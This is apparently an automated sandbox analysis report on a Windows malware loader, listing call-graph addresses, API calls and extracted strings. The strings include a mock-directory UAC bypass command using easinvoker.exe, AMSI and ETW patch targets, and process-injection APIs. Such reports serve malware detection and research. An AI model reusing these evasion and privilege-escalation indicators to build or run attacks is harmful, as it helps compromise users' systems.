                                                                                                                                            execution_graph 37938 299f2a8 37939 299f2ca 37938->37939 37942 299f306 37939->37942 37949 298c148 32 API calls 37939->37949 37941 29856b8 SysFreeString SysFreeString SysFreeString SysFreeString 37941->37942 37942->37941 37944 299f4d4 37942->37944 37950 298fe44 84 API calls 37942->37950 37943 299f589 37945 299f59d SysFreeString 37943->37945 37946 299f5af 37943->37946 37944->37943 37951 2985694 9 API calls 37944->37951 37945->37945 37945->37946 37949->37942 37950->37942 37951->37944 37952 2981b2b 37953 2981c08 37952->37953 37954 2981b3d 37952->37954 37955 2981784 37953->37955 37956 2981b43 37953->37956 37954->37956 37958 2981baf Sleep 37954->37958 37957 2981d02 37955->37957 37969 29816e0 37955->37969 37959 2981b4c 37956->37959 37962 2981be7 Sleep 37956->37962 37965 2981c1d 37956->37965 37958->37956 37961 2981bc9 Sleep 37958->37961 37961->37954 37964 2981bfd Sleep 37962->37964 37962->37965 37964->37956 37967 2981c40 37965->37967 37968 2981c9c VirtualFree 37965->37968 37966 29817a9 37970 298171d VirtualFree 37969->37970 37971 29816e9 37969->37971 37970->37966 37971->37970 37972 29816eb Sleep 37971->37972 37973 2981700 37972->37973 37973->37970 37974 2981704 Sleep 37973->37974 37974->37971 37975 29a765c MulDiv 37976 29a7698 37975->37976 37977 29a76ae 37975->37977 38041 29a7618 SelectObject 37976->38041 37991 29a0204 37977->37991 37980 29a76ba 37995 29a02a4 37980->37995 37981 29a769d 37981->37977 38042 2984820 37981->38042 37987 29a7701 37992 29a020a 37991->37992 37993 29a02a4 10 API calls 37992->37993 37994 29a0222 37993->37994 37994->37980 37996 29a02cb 37995->37996 37997 29a02b1 37995->37997 38001 29a0308 37996->38001 37998 29a02c1 37997->37998 37999 29a02b7 RegCloseKey 37997->37999 38047 29a0274 9 API calls 37998->38047 37999->37998 38002 2984820 8 API calls 38001->38002 38003 29a0331 38002->38003 38005 29a0351 38003->38005 38048 2984cec 8 API calls 38003->38048 38006 29a0373 RegOpenKeyExA 38005->38006 38007 29a0385 38006->38007 38011 29a03c1 38006->38011 38008 29a03af 38007->38008 38049 2984b0c 38007->38049 38058 29a02d0 9 API calls 38008->38058 38012 29a03de RegOpenKeyExA 38011->38012 38015 29a03f0 38012->38015 38017 29a0429 38012->38017 38014 29a041a 38059 29a02d0 9 API calls 38014->38059 38015->38014 38018 2984b0c 8 API calls 38015->38018 38021 29a0443 RegOpenKeyExA 38017->38021 38018->38014 38020 29a03bc 38061 2984788 38020->38061 38021->38020 38022 29a0455 38021->38022 38023 29a047f 38022->38023 38025 2984b0c 8 API calls 38022->38025 38060 29a02d0 9 API calls 38023->38060 38025->38023 38026 29a0538 38101 29a0510 38026->38101 38029 29a0552 38104 2984878 38029->38104 38030 29a05a1 38032 2984788 8 API calls 38030->38032 38034 29a0596 38032->38034 38033 29a055d 38109 29a05b0 32 API calls 38033->38109 38046 29a0274 9 API calls 38034->38046 38036 29a0575 38037 29a0598 38036->38037 38039 29a0581 38036->38039 38110 29a019c 32 API calls 38037->38110 38040 2984ed4 8 API calls 38039->38040 38040->38034 38041->37981 38044 2984824 38042->38044 38043 2984848 38043->37977 38044->38043 38045 2982cc8 8 API calls 38044->38045 38045->38043 38046->37987 38047->37996 38048->38005 38050 2984b1d 38049->38050 38051 2984b5a 38050->38051 38052 2984b43 38050->38052 38071 298484c 38051->38071 38065 2984ed4 38052->38065 38055 2984b8b 38056 2984b50 38056->38055 38076 29847dc 38056->38076 38058->38020 38059->38020 38060->38020 38062 298478e 38061->38062 38064 29847a9 38061->38064 38063 2982cc8 8 API calls 38062->38063 38062->38064 38063->38064 38064->37987 38064->38026 38066 2984ee1 38065->38066 38070 2984f11 38065->38070 38068 298484c 8 API calls 38066->38068 38069 2984eed 38066->38069 38067 2984788 8 API calls 38067->38069 38068->38070 38069->38056 38070->38067 38072 2984850 38071->38072 38073 2984874 38071->38073 38082 2982cac 38072->38082 38073->38056 38075 298485d 38075->38056 38077 29847e0 38076->38077 38080 29847f0 38076->38080 38079 298484c 8 API calls 38077->38079 38077->38080 38078 298481e 38078->38055 38079->38080 38080->38078 38092 2982cc8 38080->38092 38083 2982cc3 38082->38083 38086 2982cb0 38082->38086 38083->38075 38084 2982cba 38084->38075 38085 2982dd5 38091 2982da4 7 API calls 38085->38091 38086->38084 38086->38085 38090 298686c TlsGetValue 38086->38090 38089 2982df6 38089->38075 38090->38085 38091->38089 38093 2982cd6 38092->38093 38094 2982ccc 38092->38094 38093->38078 38094->38093 38095 2982dd5 38094->38095 38099 298686c TlsGetValue 38094->38099 38100 2982da4 7 API calls 38095->38100 38098 2982df6 38098->38078 38099->38095 38100->38098 38111 29a04c0 38101->38111 38103 29a0524 38103->38029 38103->38030 38105 298484c 8 API calls 38104->38105 38106 2984888 38105->38106 38107 2984788 8 API calls 38106->38107 38108 29848a0 38107->38108 38108->38033 38109->38036 38110->38034 38112 29a04d9 38111->38112 38113 29a04ed RegQueryValueExA 38112->38113 38114 29a0504 38113->38114 38114->38103 38115 29e8704 38118 29dca40 38115->38118 38119 29dca48 38118->38119 38119->38119 38120 29dca4f 38119->38120 38121 29dca74 38120->38121 38122 29dca7a 38121->38122 38123 29dca8f 38122->38123 38124 29dca7e 38122->38124 38126 29847dc 8 API calls 38123->38126 38125 29847dc 8 API calls 38124->38125 38127 29dca8d 38125->38127 38126->38127 38128 2984b0c 8 API calls 38127->38128 38129 29dcabc 38128->38129 39893 2984c4c 38129->39893 38132 29dcace 38133 29dcae7 38132->38133 38134 29dcaef 38133->38134 38135 29dcaf9 38134->38135 39895 299fd38 38135->39895 38138 2984b0c 8 API calls 38139 29dcb20 38138->38139 38140 2984c4c 38139->38140 38141 29dcb28 38140->38141 39904 2984980 38141->39904 39894 2984c50 39893->39894 39894->38132 39896 299fd4c 39895->39896 39897 299fd90 GetProcAddress 39896->39897 39898 299fdb8 39897->39898 39899 299fdd2 GetCurrentProcess 39898->39899 39900 299fb78 39899->39900 39901 299fdee FreeLibrary 39900->39901 39906 29847ac 39901->39906 39905 2984986 39904->39905 39908 29847b2 39906->39908 39907 29847d8 39907->38138 39908->39907 39909 2982cc8 8 API calls 39908->39909 39909->39908 39910 29817c3 39911 29817d8 39910->39911 39917 298174b 39910->39917 39919 2981867 Sleep 39911->39919 39922 29817ea 39911->39922 39912 29819d4 39916 29819e3 Sleep 39912->39916 39924 2981a22 39912->39924 39913 29817f9 39914 2981720 VirtualAlloc 39914->39917 39915 2981b25 39918 29819f9 Sleep 39916->39918 39916->39924 39917->39910 39917->39912 39917->39914 39917->39915 39920 29816e0 2 API calls 39917->39920 39918->39912 39919->39922 39923 2981880 Sleep 39919->39923 39920->39917 39921 29818c8 39930 29818d4 39921->39930 39931 2981668 39921->39931 39922->39913 39922->39921 39925 29818a6 Sleep 39922->39925 39923->39911 39926 2981668 VirtualAlloc 39924->39926 39928 2981a40 39924->39928 39925->39921 39927 29818bc Sleep 39925->39927 39926->39928 39927->39922 39935 29815fc 39931->39935 39933 2981670 VirtualAlloc 39934 2981687 39933->39934 39934->39930 39936 298159c 39935->39936 39936->39933 39937 2984fa4 39938 2984f68 39937->39938 39939 2984f38 39937->39939 39938->39939 39940 2984f6e SysFreeString 39938->39940 39940->39939 39941 29e9740 39949 29868b8 39941->39949 39945 29e976e 39946 29e9786 GetMessageA 39945->39946 39947 29e977a TranslateMessage DispatchMessageA 39946->39947 39948 29e9796 39946->39948 39947->39946 39950 29868c3 39949->39950 39954 2984444 39950->39954 39952 29868fd 39953 2984558 SysFreeString 39952->39953 39953->39945 39955 298448a 39954->39955 39956 2984508 39955->39956 39966 29843dc 39955->39966 39956->39952 39958 29846c5 39956->39958 39962 29846d6 39956->39962 39972 2984608 GetStdHandle WriteFile GetStdHandle WriteFile MessageBoxA 39958->39972 39960 29846cf 39960->39962 39961 298471b FreeLibrary 39961->39962 39962->39961 39963 298473f 39962->39963 39964 2984748 39963->39964 39965 298474e ExitProcess 39963->39965 39964->39965 39967 29843ec 39966->39967 39968 298441f 39966->39968 39967->39968 39969 2981668 VirtualAlloc 39967->39969 39973 29e95f8 39967->39973 39987 2985b78 39967->39987 39968->39956 39969->39967 39972->39960 39974 29e9612 GetVersion 39973->39974 39975 29e9670 39973->39975 39991 29c7420 GetCurrentProcessId 39974->39991 39975->39967 39979 29e9636 40023 2997200 34 API calls 39979->40023 39981 29e9640 40024 29971ac 34 API calls 39981->40024 39983 29e9650 40025 29971ac 34 API calls 39983->40025 39985 29e9660 40026 29971ac 34 API calls 39985->40026 39988 2985b88 GetModuleFileNameA 39987->39988 39989 2985ba4 39987->39989 40176 2985ddc GetModuleFileNameA RegOpenKeyExA 39988->40176 39989->39967 40027 29896ec 39991->40027 39994 29847dc 8 API calls 39995 29c7469 39994->39995 39996 29c7479 GetCurrentThreadId 39995->39996 39997 29896ec 32 API calls 39996->39997 39998 29c74ad 39997->39998 39999 29847dc 8 API calls 39998->39999 40000 29c74ba 39999->40000 40001 29c74c4 GlobalAddAtomA 40000->40001 40002 2984c4c 40001->40002 40003 29c74da RegisterClipboardFormatA 40002->40003 40030 2997b44 40003->40030 40005 29c74f1 40034 29c7028 40005->40034 40007 29c74fb 40042 29c6dd4 40007->40042 40009 29c7507 40046 29d1538 40009->40046 40011 29c751a 40061 29d2740 40011->40061 40013 29c7530 40078 29972ec 34 API calls 40013->40078 40015 29c755a GetModuleHandleA 40016 29c757a 40015->40016 40017 29c756a GetProcAddress 40015->40017 40018 2984788 8 API calls 40016->40018 40017->40016 40019 29c758f 40018->40019 40020 2984788 8 API calls 40019->40020 40021 29c7597 40020->40021 40022 2997160 34 API calls 40021->40022 40022->39979 40023->39981 40024->39983 40025->39985 40026->39975 40079 2989700 40027->40079 40031 2997b4a 40030->40031 40032 2997b5f RtlInitializeCriticalSection 40031->40032 40033 2997b74 40032->40033 40033->40005 40035 29c703c SetErrorMode 40034->40035 40036 29c7195 40034->40036 40037 29c707c 40035->40037 40038 29c7060 GetModuleHandleA GetProcAddress 40035->40038 40036->40007 40039 29c7089 LoadLibraryA 40037->40039 40040 29c7177 SetErrorMode 40037->40040 40038->40037 40039->40040 40041 29c70a5 10 API calls 40039->40041 40040->40007 40041->40040 40043 29c6dda 40042->40043 40094 29c6fc4 40043->40094 40045 29c6e48 40045->40009 40047 29d1542 40046->40047 40107 299d8bc 40047->40107 40049 29d1558 40111 29d18f4 LoadCursorA 40049->40111 40052 29d1591 40116 29a1fe4 40052->40116 40054 29d160f 40055 29a1fe4 10 API calls 40054->40055 40056 29d1621 40055->40056 40057 29a1fe4 10 API calls 40056->40057 40058 29d1633 40057->40058 40120 29d1d24 40058->40120 40060 29d1640 40060->40011 40062 29d274f 40061->40062 40063 299d8bc 32 API calls 40062->40063 40064 29d2765 40063->40064 40065 29d2822 LoadIconA 40064->40065 40158 29a7524 40065->40158 40067 29d2845 GetModuleFileNameA OemToCharA 40068 29d288e 40067->40068 40069 29d28b4 CharNextA CharLowerA 40068->40069 40070 29d28dc 40069->40070 40160 299ea38 GetClassInfoA 40070->40160 40073 29d28fe 40169 29d2a94 45 API calls 40073->40169 40074 29d2905 40170 29d4b14 8 API calls 40074->40170 40077 29d2927 40077->40013 40078->40015 40080 2989726 40079->40080 40082 2989759 40080->40082 40092 29892f4 32 API calls 40080->40092 40083 29897c3 40082->40083 40090 2989776 40082->40090 40084 2984878 8 API calls 40083->40084 40086 29896fb 40084->40086 40085 29897b7 40087 2984ed4 8 API calls 40085->40087 40086->39994 40087->40086 40088 2984788 8 API calls 40088->40090 40089 2984ed4 8 API calls 40089->40090 40090->40085 40090->40088 40090->40089 40093 29892f4 32 API calls 40090->40093 40092->40082 40093->40090 40095 29c6fcc 40094->40095 40096 29c6fd3 40094->40096 40097 29c6ffe SystemParametersInfoA 40095->40097 40098 29c700f SendMessageA 40095->40098 40103 29c6fd1 40095->40103 40099 29c6fe9 40096->40099 40100 29c6fe0 40096->40100 40097->40103 40098->40103 40106 29c6f24 SystemParametersInfoA 40099->40106 40105 29c6f54 RegisterClipboardFormatA RegisterClipboardFormatA SendMessageA SendMessageA 40100->40105 40103->40045 40104 29c6ff0 40104->40045 40105->40103 40106->40104 40108 299d8c3 40107->40108 40109 299d8e8 40108->40109 40138 299da78 32 API calls 40108->40138 40109->40049 40112 29d1913 40111->40112 40113 29d192c LoadCursorA 40112->40113 40115 29d157b GetKeyboardLayout 40112->40115 40139 29d19b0 40113->40139 40115->40052 40117 29a1fea 40116->40117 40142 29a14f0 40117->40142 40119 29a200c 40119->40054 40121 29d1d3d 40120->40121 40122 29d1d6f SystemParametersInfoA 40121->40122 40123 29d1d9a 40122->40123 40124 29d1d82 CreateFontIndirectA 40122->40124 40153 29a2434 13 API calls 40123->40153 40152 29a2434 13 API calls 40124->40152 40126 29d1d98 40127 29d1dae SystemParametersInfoA 40126->40127 40129 29d1dce CreateFontIndirectA 40127->40129 40130 29d1e02 40127->40130 40154 29a2434 13 API calls 40129->40154 40156 29a2518 13 API calls 40130->40156 40133 29d1e12 GetStockObject 40157 29a2434 13 API calls 40133->40157 40134 29d1de7 CreateFontIndirectA 40155 29a2434 13 API calls 40134->40155 40137 29d1e00 40137->40060 40138->40109 40140 2982cac 8 API calls 40139->40140 40141 29d19c3 40140->40141 40141->40112 40143 29a150b 40142->40143 40150 29a14d8 RtlEnterCriticalSection 40143->40150 40145 29a1572 40151 29a14e4 RtlLeaveCriticalSection 40145->40151 40146 29a1515 40146->40145 40147 2982cac 8 API calls 40146->40147 40147->40145 40149 29a15c3 40149->40119 40150->40146 40151->40149 40152->40126 40153->40127 40154->40134 40155->40137 40156->40133 40157->40137 40159 29a7530 40158->40159 40159->40067 40161 299ea68 40160->40161 40162 299ea91 40161->40162 40163 299ea87 RegisterClassA 40161->40163 40164 299ea76 UnregisterClassA 40161->40164 40171 298738c 40162->40171 40163->40162 40164->40163 40166 299eabf 40167 299eadc 40166->40167 40168 299ead3 SetWindowLongA 40166->40168 40167->40073 40167->40074 40168->40167 40169->40074 40170->40077 40175 2982ffc 40171->40175 40173 298739f CreateWindowExA 40174 29873d9 40173->40174 40174->40166 40175->40173 40177 2985e5f 40176->40177 40178 2985e1f RegOpenKeyExA 40176->40178 40194 2985c18 6 API calls 40177->40194 40178->40177 40179 2985e3d RegOpenKeyExA 40178->40179 40179->40177 40181 2985ee8 lstrcpyn GetThreadLocale GetLocaleInfoA 40179->40181 40185 2985f1f 40181->40185 40186 2986002 40181->40186 40182 2985e84 RegQueryValueExA 40183 2985ea4 RegQueryValueExA 40182->40183 40184 2985ec6 RegCloseKey 40182->40184 40183->40184 40187 2985ec2 40183->40187 40184->39989 40184->40181 40185->40186 40188 2985f2f lstrlen 40185->40188 40186->39989 40187->40184 40189 2985f47 40188->40189 40189->40186 40190 2985f6c lstrcpyn LoadLibraryExA 40189->40190 40191 2985f94 40189->40191 40190->40191 40191->40186 40192 2985f9e lstrcpyn LoadLibraryExA 40191->40192 40192->40186 40193 2985fd0 lstrcpyn LoadLibraryExA 40192->40193 40193->40186 40194->40182
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$FileName$CloseName_$AddressAttributesCurrentFreeLibraryModuleProcProcessWrite
                                                                                                                                            • String ID: .png$.url$@^@$Advapi$BCryptQueryProviderRegistration$BCryptRegisterProvider$BCryptVerifySignature$C:\Users\Public\$C:\Users\Public\Libraries$C:\Windows\SysWOW64$C:\Windows\System32\$C:\\Users\\Public\\Libraries\\$C:\\Windows \\System32\\easinvoker.exe$CreateProcessA$CreateProcessAsUserA$CreateProcessAsUserW$CreateProcessW$CreateProcessWithLogonW$CryptSIPGetInfo$CryptSIPGetSignedDataMsg$CryptSIPVerifyIndirectData$DEEX$DllGetActivationFactory$DllGetClassObject$DllRegisterServer$DlpCheckIsCloudSyncApp$DlpGetArchiveFileTraceInfo$DlpGetWebSiteAccess$DlpNotifyPreDragDrop$EnumProcessModules$EnumServicesStatusA$EnumServicesStatusExA$EnumServicesStatusExW$EnumServicesStatusW$EtwEventWrite$EtwEventWriteEx$FindCertsByIssuer$FlushInstructionCache$GET$HotKey=$I_QueryTagInformation$IconIndex=$Initialize$Kernel32$LdrGetProcedureAddress$LdrLoadDll$MZP$NtAccessCheck$NtAlertResumeThread$NtCreateSection$NtDeviceIoControlFile$NtGetWriteWatch$NtMapViewOfSection$NtOpenFile$NtOpenProcess$NtOpenSection$NtQueryDirectoryFile$NtQueryInformationThread$NtQuerySecurityObject$NtQuerySystemInformation$NtQueryVirtualMemory$NtReadVirtualMemory$NtSetSecurityObject$NtWaitForSingleObject$NtWriteVirtualMemory$Ntdll$OpenProcess$OpenSession$RtlAllocateHeap$RtlCreateQueryDebugBuffer$RtlQueryProcessDebugInformation$SLGatherMigrationBlob$SLGetEncryptedPIDEx$ScanBuffer$ScanString$SetUnhandledExceptionFilter$SxTracerGetThreadContextDebug$TRr$TrustOpenStores$URL=file:"$UacInitialize$UacScan$UacUninitialize$VirtualAlloc$VirtualAllocEx$VirtualProtect$WinHttp.WinHttpRequest.5.1$WintrustAddActionID$WriteVirtualMemory$[InternetShortcut]$^^Nc$acS$advapi32$bcrypt$can$cmd /c "C:\\Windows \\System32\\easinvoker.exe"$connect$endpointdlp$http$iexpress.exe$kernel32$mssip32$ntdll$psapi$smartscreenps$spp$sppc$sppwmi$wintrust$ws2_32
                                                                                                                                            • API String ID: 976750054-1036056120
                                                                                                                                            • Opcode ID: 20d05f8306c397172c1904776551593227b5a6bbaf588f71a4bacc33637ea9d1
                                                                                                                                            • Instruction ID: cb9260b7e74709ed4a086ec9d4bac7db288bea660cda860279353140f30c051f
                                                                                                                                            • Opcode Fuzzy Hash: 20d05f8306c397172c1904776551593227b5a6bbaf588f71a4bacc33637ea9d1
                                                                                                                                            • Instruction Fuzzy Hash: 82F32035A0111A8BDB25FBA4DD80ADEB3BAEFC4700F1454E6D10AE7254DB31EE868F51
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            APIs
                                                                                                                                            • RtlDosPathNameToNtPathName_U.NTDLL(00000000,?,00000000,00000000), ref: 029DB7A3
                                                                                                                                            • NtClose.NTDLL(?), ref: 029DB81D
                                                                                                                                              • Part of subcall function 02984F68: SysFreeString.OLEAUT32 ref: 02984F76
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Path$CloseFreeNameName_String
                                                                                                                                            • String ID:
                                                                                                                                            • API String ID: 11680810-0
                                                                                                                                            • Opcode ID: e5272d818eef4bf6dbcc10eb2e133887c686fa7da82a877d8afe7ff83227f9f7
                                                                                                                                            • Instruction ID: 633e05bd99c33f928fca9f863e91c24f3f71fd17f8066f77918f5e44ac27a452
                                                                                                                                            • Opcode Fuzzy Hash: e5272d818eef4bf6dbcc10eb2e133887c686fa7da82a877d8afe7ff83227f9f7
                                                                                                                                            • Instruction Fuzzy Hash: 99210371A403097AEB10EAD4CC52FDEB7BDEF88700F510461F600F71C0DA74AA049BA4
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            APIs
                                                                                                                                            • GetCurrentProcessId.KERNEL32(?,00000000,029C7598), ref: 029C7441
                                                                                                                                            • GetCurrentThreadId.KERNEL32 ref: 029C748F
                                                                                                                                            • GlobalAddAtomA.KERNEL32(00000000), ref: 029C74C5
                                                                                                                                            • RegisterClipboardFormatA.USER32(00000000), ref: 029C74DB
                                                                                                                                              • Part of subcall function 02997B44: RtlInitializeCriticalSection.NTDLL(List), ref: 02997B63
                                                                                                                                              • Part of subcall function 029C7028: SetErrorMode.KERNEL32(00008000), ref: 029C7041
                                                                                                                                              • Part of subcall function 029C7028: GetModuleHandleA.KERNEL32(USER32,00000000,029C718E,?,00008000), ref: 029C7065
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(00000000,WINNLSEnableIME), ref: 029C7072
                                                                                                                                              • Part of subcall function 029C7028: LoadLibraryA.KERNEL32(imm32.dll,00000000,029C718E,?,00008000), ref: 029C708E
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetContext), ref: 029C70B0
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmReleaseContext), ref: 029C70C5
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetConversionStatus), ref: 029C70DA
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetConversionStatus), ref: 029C70EF
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetOpenStatus), ref: 029C7104
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetCompositionWindow), ref: 029C7119
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmSetCompositionFontA), ref: 029C712E
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmGetCompositionStringA), ref: 029C7143
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmIsIME), ref: 029C7158
                                                                                                                                              • Part of subcall function 029C7028: GetProcAddress.KERNEL32(029EB54C,ImmNotifyIME), ref: 029C716D
                                                                                                                                              • Part of subcall function 029C7028: SetErrorMode.KERNEL32(?,029C7195,00008000), ref: 029C7188
                                                                                                                                              • Part of subcall function 029D1538: GetKeyboardLayout.USER32(00000000), ref: 029D157D
                                                                                                                                              • Part of subcall function 029D2740: LoadIconA.USER32(02A17030,MAINICON), ref: 029D2837
                                                                                                                                              • Part of subcall function 029D2740: GetModuleFileNameA.KERNEL32(02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029D2869
                                                                                                                                              • Part of subcall function 029D2740: OemToCharA.USER32(?,?), ref: 029D287C
                                                                                                                                              • Part of subcall function 029D2740: CharNextA.USER32(?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000), ref: 029D28BB
                                                                                                                                              • Part of subcall function 029D2740: CharLowerA.USER32(00000000,?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?), ref: 029D28C1
                                                                                                                                            • GetModuleHandleA.KERNEL32(USER32,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029C755F
                                                                                                                                            • GetProcAddress.KERNEL32(00000000,AnimateWindow), ref: 029C7570
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: AddressProc$CharModule$CurrentErrorHandleLoadMode$AtomClipboardCriticalFileFormatGlobalIconInitializeKeyboardLayoutLibraryLowerNameNextProcessRegisterSectionThread
                                                                                                                                            • String ID: AnimateWindow$ControlOfs%.8X%.8X$Delphi%.8X$USER32
                                                                                                                                            • API String ID: 1041971040-1126952177
                                                                                                                                            • Opcode ID: 596b55d6de8ebc6c97aacc18fed5ffcef1521ba55dfb0096d07cc5d106562c32
                                                                                                                                            • Instruction ID: d3009d0b4f4fb3e02c48ae54e7beed683a7115e0a39f6cfe44d21549b97a8cf9
                                                                                                                                            • Opcode Fuzzy Hash: 596b55d6de8ebc6c97aacc18fed5ffcef1521ba55dfb0096d07cc5d106562c32
                                                                                                                                            • Instruction Fuzzy Hash: B5416874A442458FDB01FFE8E880AAEB7FEFF89310B114928E004EB311DA35A911CF65
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5027 29d2740-29d274d 5028 29d274f-29d2752 call 2983bdc 5027->5028 5029 29d2757-29d276f call 299d8bc 5027->5029 5028->5029 5033 29d277f-29d2789 5029->5033 5034 29d2771-29d2779 5029->5034 5035 29d2799-29d2890 call 29838a0 * 3 call 29a7150 LoadIconA call 29a7524 GetModuleFileNameA OemToCharA call 298ce38 5033->5035 5036 29d278b-29d2793 5033->5036 5034->5033 5049 29d28a0-29d28af call 298ce6c 5035->5049 5050 29d2892-29d289b call 2989024 5035->5050 5036->5035 5054 29d28b4-29d28e9 CharNextA CharLowerA call 29849f8 call 299ea38 5049->5054 5055 29d28b1 5049->5055 5050->5049 5059 29d28ee-29d28fc 5054->5059 5055->5054 5060 29d28fe-29d2900 call 29d2a94 5059->5060 5061 29d2905-29d2934 call 29d4b14 call 29d5674 5059->5061 5060->5061 5067 29d2945-29d294c 5061->5067 5068 29d2936-29d2942 call 2983c34 5061->5068 5068->5067
                                                                                                                                            APIs
                                                                                                                                            • LoadIconA.USER32(02A17030,MAINICON), ref: 029D2837
                                                                                                                                            • GetModuleFileNameA.KERNEL32(02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000,?,00000000,029C7598), ref: 029D2869
                                                                                                                                            • OemToCharA.USER32(?,?), ref: 029D287C
                                                                                                                                            • CharNextA.USER32(?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?,00000000), ref: 029D28BB
                                                                                                                                            • CharLowerA.USER32(00000000,?,?,?,02A17030,?,00000100,02A17030,MAINICON,?,?,?,029C7530,00000000,00000000,?), ref: 029D28C1
                                                                                                                                              • Part of subcall function 029D2A94: GetClassInfoA.USER32(02A197F8,029EB674,?), ref: 029D2AF3
                                                                                                                                              • Part of subcall function 029D2A94: RegisterClassA.USER32(029EB650), ref: 029D2B0B
                                                                                                                                              • Part of subcall function 029D2A94: SetWindowLongA.USER32(0000000E,000000FC,10940000), ref: 029D2BA7
                                                                                                                                              • Part of subcall function 029D2A94: SendMessageA.USER32(0000000E,00000080,00000001,00000000), ref: 029D2BC9
                                                                                                                                            Strings
                                                                                                                                            Memory Dump Source
                                                                                                                                            • Source File: 00000006.00000002.1838442893.0000000002981000.00000020.00001000.00020000.00000000.sdmp, Offset: 02981000, based on PE: false
                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                            • Snapshot File: hcaresult_6_2_2981000_Clmgncrs.jbxd
                                                                                                                                            Similarity
                                                                                                                                            • API ID: Char$Class$FileIconInfoLoadLongLowerMessageModuleNameNextRegisterSendWindow
                                                                                                                                            • String ID: MAINICON
                                                                                                                                            • API String ID: 2763768735-2283262055
                                                                                                                                            • Opcode ID: 995556d7eedb71118c428a68395e24c38429183637acd71a9c7bba158322b031
                                                                                                                                            • Instruction ID: 7d1df162d9a4b7a0ae1fe3491fc2edac1cf309d07a9c045a411803b9749fc7d3
                                                                                                                                            • Opcode Fuzzy Hash: 995556d7eedb71118c428a68395e24c38429183637acd71a9c7bba158322b031
                                                                                                                                            • Instruction Fuzzy Hash: BB517C70A042448FDB50EF68C984B857BE9AB55314F4884F9DC48CF346DBB6D888CF61
                                                                                                                                            Uniqueness

                                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                                            Control-flow Graph

                                                                                                                                            • Executed
                                                                                                                                            • Not Executed
                                                                                                                                            control_flow_graph 5071 29817c3-29817d2 5072 29817d8-29817e8 5071->5072 5073 2981a04-2981a09 5071->5073 5074 29817ea-29817f7 5072->5074 5075 2981840-2981849 5072->5075 5076 2981b1c-2981b1f 5073->5076 5077 2981a0f-2981a20 5073->5077 5078 29817f9-2981806 5074->5078 5079 2981810-298181c 5074->5079 5075->5074 5082 298184b-2981857 5075->5082 5083 2981720-2981749 VirtualAlloc 5076->5083 5084 2981b25-2981b27 5076->5084 5080 2981a22-2981a3e 5077->5080 5081 29819d4-29819e1 5077->5081 5088 2981808-298180c 5078->5088 5089 2981830-298183d 5078->5089 5086 298188c-2981895 5079->5086 5087 298181e-298182c 5079->5087 5090 2981a4c-2981a5b 5080->5090 5091 2981a40-2981a48 5080->5091 5081->5080 5085 29819e3-29819f7 Sleep 5081->5085 5082->5074 5092 2981859-2981865 5082->5092 5093 298177b-2981781 5083->5093 5094 298174b-2981778 call 29816e0 5083->5094 5085->5080 5095 29819f9-2981a00 Sleep 5085->5095 5101 29818c8-29818d2 5086->5101 5102 2981897-29818a4 5086->5102 5097 2981a5d-2981a71 5090->5097 5098 2981a74-2981a7c 5090->5098 5096 2981aa8-2981abe 5091->5096 5092->5074 5099 2981867-298187a Sleep 5092->5099 5093->5071 5094->5093 5095->5081 5108 2981ac0-2981ace 5096->5108 5109 2981ad7-2981ae3 5096->5109 5097->5096 5104 2981a98-2981a9a call 2981668 5098->5104 5105 2981a7e-2981a96 5098->5105 5099->5074 5103 2981880-2981887 Sleep 5099->5103 5110 2981944-2981950 5101->5110 5111 29818d4-29818ff 5101->5111 5102->5101 5107 29818a6-29818ba Sleep 5102->5107 5103->5075 5119 2981a9f-2981aa7 5104->5119 5105->5119 